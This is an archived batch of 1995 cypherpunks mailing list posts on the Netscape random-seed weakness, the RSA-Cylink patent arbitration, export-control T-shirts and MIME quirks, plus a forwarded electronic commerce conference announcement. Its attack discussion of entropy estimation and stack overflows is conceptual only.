What do you mean, mathematically impossible? Thats silly.

> Or if that doesn't sit well with copyright interests, how about
> writing up an open spec about how the random number generator works?
> Then we can critique it.

That makes good sense, but I doubt they are that sensible. I also
worry that they would try to do something like patenting obvious and
long used techniques to "protect" themselves.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Wed, 20 Sep 95 05:25:33 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <199509201218.MAA00433@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


A couple comments on using the time as a seed:

Any system running NTP will let you know its clock to within a couple
ms; some folks have gotten NTP accuracy down to the high hundred
microseconds on real-time systems..

Any entropy you get from sampling the system clock will have to come
from the low-order bits of the tv_usec, or equivalent, and you'll only
get a few bits per sample.

Getting real entropy from mouse movements under X may be tricky,
because the X server goes out of its way to compress mouse movement
reporting and to buffer events sent to the client ("X is an exercise
in avoiding system calls").  You'll probably get less entropy than you
might think.

>   the second 32bit seed is the "tick count", which I'm told is the number of
> milliseconds since windows started.

A 32-bit ms-resolution counter wraps roughly every 50 days.  Very few
Windoze PC's stay up that long :-).

In a long-term active attack, the tick count can be estimated by
periodically pinging the system under attack, noticing when it goes
off the air and then back on again, and using that as a base value for
the tick count search, so the tick count probably only adds a factor
of somewhat less than 2**10 to the keyspace, not 2**32..

					- Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 20 Sep 95 06:55:15 PDT
To: perry@piermont.com
Subject: Re: Cylink
In-Reply-To: <199509201328.JAA04874@frankenstein.piermont.com>
Message-ID: <199509201343.AA12329@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> Andrew Loewenstern writes:
> > Any ideas on how this will change the legal status of RSAREF and PGP?

Then Perry Metzger replied:
> I'm much more interested in how this changes the legal status of the
> D-H derived encryption systems like ElGamal, and how it alters the
> patent status on the DSS, which is basically also derived from the
> same root.

What I'm waiting to see is who sues RSADSI for recovery of royalties
paid to Cylink. Imagine how Apple, Lotus, and all of the other
bigcorps using RSA must feel right about now: they licensed a patent
from the wrong people, and it appears that RSADSI may have known that
their rights had expired.

What about Roger Schlafly's suit? Anything new on it?

- -Paul

- -- 
Paul Robichaux, KD4JZG       | "Things are much simpler and less stressful
perobich@ingr.com            |  when you don't look to the law to fix things."
Not speaking for Intergraph  |      - Tim May (tcmay@got.net) on cypherpunks
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGAajKfb4pLe9tolAQG8dwP+Mt8frNZVf87eQOlpIGZ0V7fJDD1CoLSg
6yt6inPeTcjUK52rYLV4ut2hm2q7yASsGi2PlXm+oXh9gi5rCjCNClR8ffRI/f3Z
PklwDT+KYm9XB9pJfDPJXzVf9jevY7Ge+m4QBFWymXiQ3DLhsu+Mh8kijTO47uJ9
rZHjHPFjBEo=
=UAqt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@CS.Berkeley.EDU>
Date: Wed, 20 Sep 95 08:49:11 PDT
To: cypherpunks@toad.com
Subject: Munitions shirt (again)
Message-ID: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


So, Dave and I got free munitions shirts (they're different, though;
the font is smaller and they have a bunch of X'd out Constitutional
Amendments on the back; I think they ere designed by Joel Furr) for
our bug find.

So I'm wearing it today.  The thing is, I live in International House,
a residence that has 50% non-Americans.

So, any consensus as to whether it's actually illegal to do so?  I
remember some disagreement a few weeks ago that AFAIK wasn't resolved.

As far as I can tell, it's _technically_ illegal, but any LEO would be
out of his mind to try to enforce it (it would have to be a Fed, too,
wouldn't it?  Or can regular city cops get you for violating export
restrictions?).

   - Ian



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Wed, 20 Sep 95 08:56:44 PDT
To: cypherpunks@toad.com
Subject: RSA Prevails In Arbitration Against Cylink
Message-ID: <9508208116.AA811612567@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here's an article on the RSA-Cylink arbitration from
the business wire.
                --Bob Baldwin
-   -----------------------------

RSA Prevails In Arbitration Against Cylink
REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An Arbitration Panel 
recently ruled that Cylink does not have a license to RSA patented technology, 
that RSA's software licensing practices do not breach any agreement with Cylink 
or its wholly owned subsidiary Caro-Kann and that RSA now has the exclusive 
right to license the RSA patent.

In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by agreement of the 
parties, and after nearly a month of testimony, ruled in favor of RSA on every 
significant issue. The Panel held that neither Cylink nor Caro-Kann had a 
license to practice RSA patented technology. Cylink admittedly incorporates this
technology in its Secure X.25 product line, without any license to do so.

The Panel also found that RSA's software licensing practices did not materially 
breach any of Cylink's rights. The Panel did not rule that anyone, (specifically
including RSA and its software customers) infringed any existing patent rights 
of anyone - including Cylink.

As a result of the Panel's ruling, RSA now has the exclusive right to license 
the patented RSA technology. According to Jim Bidzos, the President of RSA, `RSA
will continue to conduct its software business in exactly the same way that it 
has for the past ten years.

`In addition, RSA anticipates that licenses to the RSA Patent will now be much 
more readily available, because they now can now be granted without Cylink 
interference. RSA has all of the intellectual property rights which it needs to 
license its software. RSA will vigorously defend against any claim to the 
contrary.`

A recent Cylink press release on the Ruling of the Arbitration Panel is wildly 
inaccurate. The same Robert Fougner (Cylink's General Counsel) who is cited in 
the Cylink press release has repeatedly made express representations to third 
parties that the Stanford Patents do not cover, and are not infringed by, the 
manufacture, use or sale of products incorporating RSA's TIPEM software 
developer's toolkit.

As noted by Mr. Bidzos: `Cylink lost every single significant issue in the 
Arbitration. Their press release was simply an attempt to cover up what has been
a crushing defeat.`

Questions regarding the Arbitration Panel Ruling or RSA licenses should be 
directed to Kurt Stammberger, RSA Technology Marketing Manager, or Paul Livesay,
RSA Director of Legal Affairs.

CONTACT: RSA

Kurt Stammberger, 415/595-8782

kurt@rsa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 20 Sep 95 09:07:16 PDT
To: perry@piermont.com
Subject: Re: netscape's response
Message-ID: <9509201603.AA13810@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> This is not to say that I think *you* are bad at this, Mr. Weinstein,
> but you certainly have colleagues with the worst possible track record.
> 
> Perry
> 
How can you say worst possible...have you forgotten Eric Allman?  Wouldn't
it be fun to try to come up with the 5 worst programmers (as far as sloppy
security holes go).  Eric completely revamped sendmail to make V8 and
put in new holes in some of the same categories as some of the well known
old holes:(  I'm glad my code isn't held up to such public scrutiny after
it's released!  I'm doing some security/crypto stuff soon for my current
employer and I'll run my design by some of you.  I'll run the code by as
well if I can get my bosses to agree.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Wed, 20 Sep 95 08:58:33 PDT
To: sommerfeld@orchard.medford.ma.us (Bill Sommerfeld)
Subject: Re: My Day
In-Reply-To: <199509201218.MAA00433@orchard.medford.ma.us>
Message-ID: <199509201411.JAA04860@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Getting real entropy from mouse movements under X may be tricky,
> because the X server goes out of its way to compress mouse movement
> reporting and to buffer events sent to the client ("X is an exercise
> in avoiding system calls").  You'll probably get less entropy than you
> might think.

Also add that many people seem to tend to swirl the mouse in fast circles,
where there isn't *any* latency between mouse movements, and you get even
less entropy.  I suspect that Colin Plumb's code, while a nice try, would
be a bit less useful that might have been otherwise suspected. 
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGAhFSS9AwzY9LDxAQF/oAP/TrE912Sy8DqTG2oQQ3bgK//5bPGmoX1h
cVS4uwSrSJ+wdkkvExZV1I3eqkQCJEkZjsJp83ZtOD44nxOd9aDiY+XuarVU8UDW
f/9oPtYCjDU2MPD+Tu4ftL9I5B0WqT+V/4RAkvwPdqNnzqgNiCTIdPwEOHp+gNl2
Cv3/3e6/Bh4=
=pvSP
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 20 Sep 95 09:15:45 PDT
To: shields@tembel.org
Subject: Re: MIME
Message-ID: <9509201612.AA13835@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> : Content-Type: application/pgp
> : Content-Transfer-Encoding: 7bit
> : Sender: owner-cypherpunks@toad.com
> : Precedence: bulk
> : Content-Length: 1092
> 
> I think that it must be the content-type that is causing problems, as
> the rest of the message is completely standard.  To the people whose
> mailers broke out in hives at that message: Do you get the same behavior
> with any message having an unknown content-type?
> -- 
> Shields.
> 

I've only ever seen the problem with Content-Type: application/pgp using
Sun's mailtool.  I don't know that I've ever gotten mail with unknown 
Content-Type though...wait let me whip some up...

Mailtool assumes anything with a content type is an attachment.  The
type is used as the name of the attachment.  A Content-Type: of 
application/foo or of just foo both yeild an attachment named foo.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 20 Sep 95 09:43:46 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
Message-ID: <ac85fa9f010210046fb1@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 3:46 PM 9/19/95, Jim Ray wrote:
....
>I don't expect to know NSA's specific brute-force capability, but
>does anyone know if the NSA has *ever* found a glaring weakness in
>software and then told its author(s) or owner(s) about it? Do "we"
>perform the "COMSEC" role Tim was speaking of better than the NSA?
>JMR
....
Once upon a time NSA would find weeknesses in friends' crypto systems and
tell them about it -- depending, of course, on the situation. It was a
reciprocal practice. We don't know that NSA didn't tell Netscape.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Sep 95 06:12:57 PDT
To: bsdc@ai.mit.edu
Subject: Conference: WORLDWIDE ELECTRONIC COMMERCE
Message-ID: <v02120d10ac85c201aa86@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 20 Sep 1995 06:03:04 +0059 (EDT)
From: Michael S Baum <baum@world.std.com>
Subject: Re: BSDC Update 1.2
To: Robert Hettinga <rah@shipwright.com>
Mime-Version: 1.0

Robert,

Can you please consider letting your Boston list (or other lists) know
about the following. Thanks.

----------------


ANNOUNCING:


The Second Annual . . .


        WORLDWIDE ELECTRONIC COMMERCE
        Law, Policy, Security &
        Controls Conference


   October 18-20, 1995
   At the Hyatt Regency Bethesda


   Phone: (214) 516-4900


The Second Annual WorldWide Electronic Commerce; Law, Policy,
Security and Controls conference is fast approaching. This
important event will feature the world's foremost experts
addressing the most important issues of implementation and
control related to secure electronic commerce. It will
focus on current problems and provide a foundation for dealing
with the emerging problems that promise to make the future
more complex. We have been fortunate in securing a faculty
that is unusually qualified and internationally recognized
who will share their experience, knowledge and theories on
the wide range of issues being addressed by this program.
We are equally pleased to have obtained affiliation for
this conference of a number of prestigious and influentual
organizations.

Please join us and your colleagues at this unique event!

   Michael S. Baum, J.D., M.B.A. Conference Chair



Provided in Affiliation with:
=============================================
* American Bar Association
  Section of Science and Technology
  Information Security Committee

* University of London
  Queen Mary & Westfield College
  Centre for Commercial Law Studies

* EDI Association of the United Kingdom

* Harvard Law School

* Internation Union of Latin Notaries

* International Chamber of Commerce, Paris

* National Institute of Standards and Technology (NIST)

* Software Publishers Association

* United Nations
  Commission on International Trade Law (UNCITRAL)

* U.S. Council of International Business
=============================================


Keynote Speaker:
----------------
   Dr. Vinton G. Cerf, Ph.D.
   Senior Vice President
   MCI Telecommunications Corp.



CONFERENCE PROGRAM ...at a glance

  GENERAL SCHEDULE
  -------------------------------------------------
    Wednesday, October 19, 1995  6:00pm - 7:30pm
    SECURE ELECTRONIC COMMERCE FOR THE BEGINNER

    Thursday, October 20, 1995
      8:00am - 9:00am   Welcome & Keynote Speech
      9:00am - 5:50pm   Sessions 1 - 5

    Friday, October 21, 1995
      8:00am - 4:50pm   Sessions 6 - 10


----------------------------------------------
TRACK - A
AGREEMENTS, LEGISLATION, POLICY AND REGULATION
----------------------------------------------
Session 1
So Who's in Charge, Anyway?
The Impact of National & Int'l Leadership & Initiatives in Secure EC
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     Sally  Katzen, Office of Management and Budget
     Bruce  McConnell, Office of Management & Budget
     Renaud  Sorieul, Esq., UNCITRAL

Session 2
Drafting Agreements for Secure Electronic Commerce
   SPEAKERS:
     Michael S Baum, Esq., Independent Monitoring
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Joe  Wackerman, Esq., United States Postal Service

Session 3
Are Privacy Requirements Inhibiting Electronic Commerce?
   SPEAKERS:
     Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti
     Prof. George  Trubow, The John Marshall Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 4
Alternative Methods of Signing:
Legal Aspects of the IRS's July 1995 Regulation
   SPEAKERS:
     Tom  Baker, Esq.,Internal Revenue Service
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service

Session 5
Digital Signature Legislation and Electronic Commerce
   SPEAKERS:
     Alan  Asay, Esq., Utah Department of Commerce
     Kirk W Dillard, Esq., State Senator, State of Illinois
     Dean  Sutherland, State Senator, Washinton State
     William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature

Session 6
The Legal Status and Effect of Digital Signatures - Perspectives
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     Mario  Miccoli, International Union of Latin Notaries

Session 7
On-Line Registration vs. In-Person Registration:
What Satisfies Business and Legal Requirements?
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Jeff  Treuhaft, Netscape Communications Corporation
     Peter  Williams, Verisign

Session 8
Antitrust in Electronic Commerce:
Shopping, Payments & Certification Authorities
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     John  Greanley, Esq., US Department of Justice, Antitrust Division

Session 9
Proving Secure Computer-Based Transactions: Evidence Revisited
   SPEAKERS:
     Margaret A Berger, Brooklyn Law School
     Charles  Nesson, Harvard Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 10
Third Party Service Providers & Certification Authorities-Can They
Successfully Limit their Liabilty
   SPEAKERS:
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line
     Renaud  Sorieul, Esq., UNCITRAL

--------------------
TRACK - B
INFORMATION SECURITY
--------------------
Session 1
Requirements for Implementing Reasonable Security Procedures
   SPEAKERS:
     Robert  Daniels, Esq., U.S. Social Security Administation
     Dain  Gary, Morgan Stanley
     Allan M Shiffman, Terisa Systems, Inc.

Session 2
Information Security Standards: Policy, Coordination & Interoperability
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Hoyt  Kesterson II, Bull Worldwide Information Systems
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     David  Solo, Bolt, Beranek and Newman

Session 3
Who's Really on the Other End:
Identification Technologies and Nonrepudiation
   SPEAKERS:
     Benjamin  Miller, Personal Identification News
     John E Siedlarz, IriScan, Inc.
     William  Sweet, National Semiconductor

Session 4
Security and Security Policy in Internet-based Payments Systems
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Tim  Jones, Mondex
     Anne  Wallace, US Department of Treasury

Session 5
When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce
   SPEAKERS:
     Prof. Michael  Froomkin, University of Miami School of Law
     Jeff  Greiveldinger, US Department of Justice, Criminal Div.
     Frank W Sudia, Bankers Trust Company

Session 6
Comparing Critical Cryptographic Algorithms, Protocols,
and Standards to Enable Secure Electronic Commerce
   SPEAKERS:
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     Ron  Rivest, Massachusetts Institute of Technology
     Miles E Smid, National Institute of Standards & Tech.

Session 7
Export Controls & Transborder Data Flows:
Is Secure Electronic Commerce in Jeopardy?
   SPEAKERS:
     James  Bidzos, RSA Data Security
     Renee H Danckwerth, Export Consultant


Session 8
'Certificates-R-US':
Trust Models and the Developing Secure Information Infrastructure
   SPEAKERS:
     Warwick  Ford, Bell-Northern Research
     Sead  Muftic, COST Computer Security Technologies
     Peter  Williams, Verisign

Session 9
Professional Accreditation and Certification -
The New Frontier in 'Remote Trust'
   SPEAKERS:
     Richard C Koenig, Int'l Info. Sys. Security Cert. Consort.
     Alan M Schwartz, Esq., American Bar Association

Session 10
Looking into the Crystal Ball: Certificates Revisited
   SPEAKERS:
     Web  Augustine, VeriSign, Inc.
     Warwick  Ford, Bell-Northern Research
     Hoyt  Kesterson II, Bull Worldwide Information Systems

-------------------------------------------
TRACK - C
LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE
-------------------------------------------
Session 1
Do Criminal Laws Really Protect Electronic Commerce?
   SPEAKERS:
     Scott  Charney, Esq., US Department of Justice
     William J Cook, Brinks, et al.
     Richard A Ress, Federal Bureau of Investigation

Session 2
Who Owns the Information, Standards, Certificates and Cryptographic Keys?
   SPEAKERS:
     Peter  Harter, National Public Telecomputing Network
     David W Maher, Esq., Sonnenschein Nath & Rosenthal
     James  Powers, Esq., Shulman, Rogers et. al

Session 3
Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ray  Nimmer, Esq., Weil, Gotshal & Manges

Session 4
Electronic Licensing and Distribution of Digital Content:
Downloading for Liability?
   SPEAKERS:
     James C McKay, Jr., Office of the Corporation Counsel, D.C.
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Mark  Traphagen, Software Publishers Association.

Session 5
Insuring Electronic Commerce Transactions and Infrastructure
   SPEAKERS:
     Andrew  Cockrane, Alexander & Alexander
     Norman R Nelson, New York Clearing House Association

Session 6
Auditing a Third Party/Value Added Network or
Certification Authority (and Its Implications)
   SPEAKERS:
     Charles H LeGrand, CIA, Institute of Internal Auditors
     John  Stelzer, COMMERCE:Institute

Session 7
Electronic Recordkeeping -
What to Save, When and How to Save It, and for How Long
   SPEAKERS:
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service
     Claude  Perreault, Chambre des notaires du Quebec

Session 8
Disaster and Contingency Planning Services: What is Needed for EC and
Certification Authorities
   SPEAKERS:
     Dain Gary, Morgan Stanley
     Ake Nilson, Marinade Limited
     Helena  Roine-Taylor, The Finnish Data Communication Assoc. FINPRO
     David Solo, Bolt, Beranek and Newman

Session 9
General Counsel's Forum on Computer-Based Trade
   SPEAKERS:
     Robert W Barger, Esq., AT&T
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line

Session 10
An Audit Model for Your Electronic Commerce Infrastructure
   SPEAKERS:
     Gerald R Bielfeldt, NationsBank
     Phillip  Oddo, Ciba-Geigy
     Horton  Sorkin, Ph.D., Howard University


------------------------------
TRACK - D
INFRASTRUCTURAL CONSIDERATIONS
------------------------------
Session 1
Securely Shopping on the Web: New Paradigms, Protocols and Opportunities
   SPEAKERS:
     Jeff Hilt, VISA International
     Todd Ostrander, Egghead Software

Session 2
What can Trusted Third Parties and Certification
Authorities Learn from the Financial Clearinghouses
   SPEAKERS:
     Carol  Barrett, Federal Reserve Bank of New York
     Bill  Nelson, National Automated Clearinghouse Associa
     Norman R Nelson, New York Clearing House Association

Session 3
Electronically 'Gluing' Computer-based Records
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Allan M Shiffman, Terisa Systems, Inc.

Session 4
Global Registries for Secure Electronic Commerce
   SPEAKERS:
     Jonathan Allen, Barum Computer Consultants
     Michel Peereman, Federation Nationale des Chambres
     Peter Robinson, US Council for International Business

Session 5
Computer-based Negotiability: What is Needed to Make it Work
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     James E Byrne, James Mason University Law School
     Ake Nilson, Marinade Limited

Session 6
Time/Date Stamping of Digital Information: Necessities & Options
   SPEAKERS:
     Richard  Rothwell, United States Postal Service
     Scott  Stornetta, Surety Technologies, Inc.

Session 7
Will Healthcare-related Electronic Commerce
Require Special Controls and Secure Infrastructures?
   SPEAKERS:
     Kathleen  Frawley, J.D., M.S., R.R.A, AHIMA
     Daniel J O'Shea, National Computer Claims Service

Session 8
The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm)
   SPEAKERS:
     Theodore S Barassi, Esq., US Council for International Business
     Mario Miccoli, International Union of Latin Notaries

Session 9
Electronic Cash and Novel Electronic Commerce Payments Systems
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ron Rivest, Massachusetts Institute of Technology
     Marvin Sirbu, Carnegie-Mellon University

Session 10
Why does Everyone Want to be a Trusted Third
Party/Certification Authority (at Least Initially)?
   SPEAKERS:
     Sead  Muftic, COST Computer Security Technologies
     Stratton D Sclavos, VeriSign, Inc.


-----------------------------------------------------------------
TO REGISTER:
-------------

Price: $550.00 (U.S.)

Name:
Title:
First Name for Badge:
Company/Organization:
Address:
City/State/Prov/Zip/Postal code:
Country:
Telephone:
Fax:
E-Mail:

Check One:
==========
[ ] I am Mailing a check in the amount of $______
[ ] I wish to charge this to a credit card (fax or mail only)
     [ ] American Express
     [ ] Visa
     [ ] MasterCard

     Card Number:
     Expiration Date:
     Name on Card:
     Signature (fax or mail):

-----------------------------------------------------------------
HOTEL RESERVATIONS:
        A special conference rate of $129 has been arranged
        for our attendees. To make arrangements, please call
        the Hyatt Regency Bethesda at (301) 657-1234

        Hyatt Regency Bethesda
        One Bethesda Metro Center
        Bethesda, MD 20814
-----------------------------------------------------------------

For more information or a complete program brochure and schedule,
contact the conference coordinators as shown below:


HOW TO CONTACT US
=================
E-Mail:  wec@multicorp.com
Phone: (214) 516-4900
Fax: (214) 424-0562

Mail: Worldwide Electronic Commerce
      PO Box 743485
      Dallas, TX 75374

===============================================
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 20 Sep 95 06:16:09 PDT
To: cypherpunks@toad.com
Subject: `Random' seed.
Message-ID: <9509200915.ZM14792@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



Vaporware which I heard around CFP '95, and have been sort of wondering about
ever since...

Some one told me that some one else [possibly Matt Blaze] had been looking
at how much randomness could be got by forking two child processes which
would just run as asynchronous clocks: whenever the parent program needs a
little `random' bit, it queries both and gives (clock(A) + clock(B) % 2)
or something.

Questions about this [to the list]:
 * who has done any [the?] work on this?
 * was it found to be useful/good or not?
 * what would be the drawbacks to adding this [Yet Another Source Of Entropy]
   to the Netscape scheme?

frodo =)

-- 
Richard Martin 
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 06:29:32 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Cylink
In-Reply-To: <9509192145.AA01100@ch1d157nwk>
Message-ID: <199509201328.JAA04874@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern writes:
> >  The arbitrators ruled that RSA hasn't had the right to sublicense
> >  the Stanford patents since 1990.
> >
> >  Cylink said it would seek royalties from companies that have licensed
> >  software code from RSA and are redistributing it, arguing that they
> >  are infringing the Stanford patents.
> 
> hahahaha, this is funny if it's true...  Anyone know which two patents they  
> are referring to? (diffie-hellman and merkle-hellman?)
> 
> Any ideas on how this will change the legal status of RSAREF and PGP?

I'm much more interested in how this changes the legal status of the
D-H derived encryption systems like ElGamal, and how it alters the
patent status on the DSS, which is basically also derived from the
same root.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 20 Sep 95 09:44:11 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509201630.JAA01430@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


I talked to somebody from RSA yesterday, and she said that they
issued a press release yesterday that she expected to see in the
papers today (I didn't see it) and would be on their web site
"soon" that would explain their position.  They say that the
arbitration agreemment maintains the status quo pretty much,
and while it doesn't limit what RSA can do, it severly limits
what Cylink can do.

I think that what RSA needs to do is hire Cylink's PR agency...

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 07:05:47 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509200403.AAA14189@clark.net>
Message-ID: <199509201405.KAA04961@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
> > > 
> > >   Sigh.  For your information the security code for 1.x versions of
> > > netscape was not even written by someone from NCSA.
> > 
> > If there is ANY place in the code that I can do a data driven buffer
> > overflow, I can force you to execute code that I supply. I don't give
> > a damn if it's in the "security" code. It makes no difference where it
> > is. If there is a chink, thats it -- you're meat.
> 
>   How would you do this if the buffer overflow happened in a buffer
> which was allocated in a separate protected heap apart from stack
> and executable data?

You could do that, but thats not how C does things. C allocates these
things on the stack. Overflow the buffer and you fandango on stack,
allowing you to change where the program counter jumps to on
subroutine exit, and allowing you to force your own machine code into
the system for execution.

I suspect that even were subroutine data allocated in a seperate heap
you could pull nasty tricks -- your protected heap probably has data
in it that controls execution flow, so cleverness might still get you
the same results.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 10:11:43 PDT
To: kinney@bogart.Colorado.EDU (W. Kinney)
Subject: Re: My Day
In-Reply-To: <199509201648.KAA11790@bogart.Colorado.EDU>
Message-ID: <199509201706.KAA02759@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> I've put my code up on the cypherpunks ftp site, but I'm still waiting to
> hear back from the site maintainers as to its final location. In any case,
> that code uses the mouse _position_ and system timings in microseconds as
> input to the MD5 engine. So swirling the mouse should provide a good source
> of random input, better the faster it's moved. 
> 
	Did you send mail to cypherpunks-ftp@csua.berkeley.edu ?

/pub/cypherpunks/randomness

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 20 Sep 95 10:08:44 PDT
To: cypherpunks@toad.com
Subject: Hypermail gateway
Message-ID: <199509201708.KAA00091@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Yesterday, I started a new hypermail gateway at:

      http://kiwi.cs.berkeley.edu/~cpunks/

   Please try not to overload the site; it's a research machine.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 20 Sep 95 10:09:50 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Please send me SSL problems...
Message-ID: <v02110108ac85f664b498@[204.179.132.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:22 9/20/95, Rich Salz wrote:
>> Jeff, the SSL specification has a severe *architectural* problem - it
>> assumes that Internet Protocols are APIs ...
